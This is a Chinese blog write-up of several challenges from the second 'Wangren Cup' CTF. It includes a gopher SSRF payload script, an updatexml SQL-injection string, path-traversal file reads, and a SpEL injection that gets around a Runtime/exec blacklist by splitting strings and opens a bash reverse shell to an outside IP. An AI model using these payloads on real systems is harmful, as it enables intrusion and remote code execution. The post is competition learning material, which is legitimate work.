第二届“网刃杯”网络安全大赛 部分writeup

最新推荐文章于 2022-05-31 00:32:28 发布
最新推荐文章于 2022-05-31 00:32:28 发布
阅读量454 收藏 1
点赞数
分类专栏: ctf 文章标签: web安全 安全 java
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/124525513
版权

第二届“网刃杯”网络安全大赛 部分writeup

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主:https://blog.csdn.net/weixin_46081055 看看ヾ(@ ˘ω˘ @)ノ!!

ICS

easyiec

流量包直接看到

请添加图片描述


web

sign_in

File协议读hosts,得到IP扫描内网,发现172.73.24.100有一台主机

请添加图片描述

根据提示打ssrf(这里我如果b赋值数字gopher就是打不了,我真的不明白)

import urllib.parse

payload =\
"""POST /index.php?a=1 HTTP/1.1
Host: 127.0.0.1:80
X-Forwarded-For:127.0.0.1
Referer: bolean.club
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

b=abc
"""  
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://172.73.24.100:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

请添加图片描述

flag{Have_A_GoOd_T1m3!!!}


upload

是sql报错注入啊…我确实对着文件名fuzz好久没出来

请添加图片描述

1.png' and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) and '

要注意让sql语句闭合,flag表是不是猜出来的…我只看到一个upload表


ez_java

请添加图片描述

任意文件读取,web.xml泄露

/download?filename=../../../web.xml

得到

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>com.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>TestServlet</servlet-name>
        <servlet-class>com.abc.servlet.TestServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>TestServlet</servlet-name>
        <url-pattern>/test388</url-pattern>
    </servlet-mapping>

</web-app>

下载两个类文件

/download?filename=../../../classes/com/abc/servlet/TestServlet.class
/download?filename=../../../classes/com/abc/servlet/DownloadServlet.class

看TestServlet.class,有个spel注入,可以看Rui0师傅讲得http://rui0.cn/archives/1043

public class TestServlet extends HttpServlet {
    /* access modifiers changed from: protected */
    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doPost(req, resp);
    }

    /* access modifiers changed from: protected */
    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        try {
            String name = new String(request.getParameter("name").getBytes("ISO8859-1"), "UTF-8");
            if (blackMatch(name)) {
                request.setAttribute("message", "name is invalid");
                request.getRequestDispatcher("/message.jsp").forward(request, response);
                return;
            }
            System.out.println(name);
            request.setAttribute("message", getAdvanceValue(name));   //name可控
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        } catch (Exception e) {
            request.setAttribute("message", "error");
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        }
    }

    private boolean blackMatch(String val) {
        for (String keyword : getBlacklist()) {
            if (Pattern.compile(keyword, 34).matcher(val).find()) {
                return true;
            }
        }
        return false;
    }

    private String getAdvanceValue(String val) {    //这里是spel执行的地方
        return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
    }

    private String[] getBlacklist() {   //有过滤,利用反射构造绕过
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}

请添加图片描述

payload(注意需要url编码)

name=#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"bash","-c","/bin/bash -i >& /dev/tcp/180.76.184.229/9999 0>&1"})}

请添加图片描述

请添加图片描述


Misc

玩坏的winxp

桌面上有meiren.png

img

取下来binwalk分离,得到压缩包解压出f1ag.png,再binwalk一次,得到一个加密压缩包

img

本来以为这个戴围脖的软件是火狐浏览器,我真的是思路清奇,然后就卡着了

赛后看了师傅们的wp知道从qq入手,有点社工思路

img

访问他的qq空间留言板,得到密码md5 dc45445a8a099e63fbb9b8480d57723a,解压密码为xiaomin520

img

得到flag

img

参考wp:https://blog.csdn.net/qq_53263789/article/details/124430442

https://mp.weixin.qq.com/s?__biz=Mzg2ODc1ODgzOQ==&mid=2247483772&idx=1&sn=0015b5a2b5db1636807b0bc4074cc5b1&chksm=cea62524f9d1ac328bb2c98d30d3b8b45a5e3cb2a31ab02232b2030eadfa1f6031db5f1a4ad3&mpshare=1&scene=23&srcid=0425zchIWRTnxXKiLSCNNWQB&sharer_sharetime=1650893619252&sharer_shareid=338e6bdd46dd97be28409a9b4d925212#rd

shu天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2022第二届网刃杯网络安全大赛-Re
qq_43264813的博客
04-25 5159
2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一、RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入经过加密之后进行比较,长度看密文得知是28字节,逆向算法发现条件太多,但是发现:加密的相关因素仅仅和铭文本身和他所在flag中的偏移有关系,可以爆破。 加密函数太复杂,直接在汇编层面爆破 先修改一下程序 添加一个跳转,然后进行爆破。 逆向算法得知,数字和特殊字符和位置没有线性关系,所以先把数字
2022第二届网刃杯网络安全大赛
tlovejr的博客
05-06 2942
前言 前段时间在机缘巧合下参加了这次的比赛,距离比赛结束也有一星期的时间,现在把部分题解给大家说一下 一、ICS1-ncsubj 1、首先先打开数据包进行查看,并追踪一下tcp流看看有没有什么收获信息 2、在上图可以看到,有3段被分开的base64编码,那就直接合起来解密 anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA== j|u|n|g|n|a|p|f|h|o|w|r|p|g| 3、发现上面还是有加密,同事大神说这个其实随波逐流解码,那就直接利用软件
2022第二届网刃杯网络安全大赛-Web
web18224617243的博客
05-31 591
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-师傅原创,禁止抄袭! 一、Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yyds。题目链接见附件,每个链接均可访问,环境5分钟重启一次。 文件上传,随便上传一个马 使用Burp抓包 根据提示,更改类型 上传文件 查询到filename上传点,报错注入,获取FLAG flag{5937a0b90b5966939cccd369291c68aa} 二
2022网刃杯
姜小孩的博客
05-06 1134
网刃杯2022 2022网刃杯
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
山东省大学生网络安全技能大赛决赛Writeup.pdf
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
第二届网刃杯网络安全大赛 Writeup
末初的CSDN博客
04-25 4654
MISC 玩坏的winxp vmdk文件,用DiskGenius打开,找到Administrator用户的桌面的学习资料 binwalk分析meiren.png,foremost分离 继续binwalk分析,foremost分离f1ag.png 分离出来的压缩包需要密码 提示QQ有压缩包密码,但是在虚拟磁盘镜像中没有找到有安装过QQ这个软件,猜测可能在线登录过,所以就找唯一安装的浏览器Firefox的本地数据 这里几个.db文件都不是.db文件,Navicat无法建立连接,几个.sqlite文
2022第二届网刃杯网络安全大赛题包
04-25
2022第二届网刃杯网络安全大赛题包
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
第二届网刃杯CTF-wp
qq_45603443的博客
04-26 785
第二届网刃杯CTF-wpWebez_javaezjsSign_inuploadReez_algorithm定时启动Re_functionfreestyleMisceasyiecTip Web ez_java package me.su; import org.springframework.expression.common.TemplateParserContext; import org.springframework.expression.spel.standard.SpelExpressionPar
2022网刃杯 个人向WP ICS/Reverse easyiec,freestyle,ez_algorithm writeup
hfv13的博客
04-25 395
ICS easyiec 虚假的签到题与真正的签到题.jpg 打开方式切到记事本 Ctrl+F 直接搜flag梭哈 REVERSE freestyle 简单逆向算法题 f5主函数 一个fun1一个fun2 先跟进fun1 输入一个值 经过处理后得到4400 atoi()这个函数百度了一下跟int()差不多 数学题 4 * (3 * int(s)/9-9 ) == 4400 得到s = 3327 记一下到fun2 提示里给到The code value is the smallest divisible 意
第二届网刃杯WriteUp
qq_45884775的博客
05-05 977
第二届网刃杯网络安全大赛--下面是我们(菜鸟一号战队)的一些解题思路不是很完美,希望对大家有用! WEB2-UPLOAD 这里上传一个后缀名以.php文件,使用Burp抓包 根据提示更改上传类型-Content-Type:ctf 点击发送上传文件 查询到注入点,报错注入,这里有截断,要拼接一下;获取FLAG Flag:{5937a0b90b5966939cccd369291c68aa} ICS4-Carefulguy 通过数据包分析,查询TCP流,发现...
[ctfshow]web入门——反序列化(web261+web264-web267)
ShenZ的博客
03-02 5881
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
[2021首届“陇剑杯”网络安全大赛] jwt
ShenZ的博客
09-16 5653
题目描述 昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答: 该网站使用了______认证方式。(如有字母请全部使用小写) 黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin) 黑客获取webshell之后,权限是______? 黑客上传的恶意文件文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt) 黑客在服务器上编译的恶意so文件,文件名是_____________。(请提交带有文件后缀的文件名,例如x.so)
第四届2021美团网络安全 MT-CTF writeup
ShenZ的博客
12-12 5543
第四届2021美团网络安全 MT-CTF 文章目录第四届2021美团网络安全 MT-CTFMISCUn(ix)zip오징어 게임 鱿鱼游戏BoomCryptoSymbol MISC Un(ix)zip flag{Welc0me_Unz1p_Wonder4} 오징어 게임 鱿鱼游戏 7-zip可以看到加密算法ZipCrypto Store 再加上备注里提示flagornot.txt,采用明文爆破 明文爆破参考:https://blog.csdn.net/q851579181q/articl
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5377
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
蓝帽杯全国大学生网络安全技能大赛
最新发布
08-24
- *2* [[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值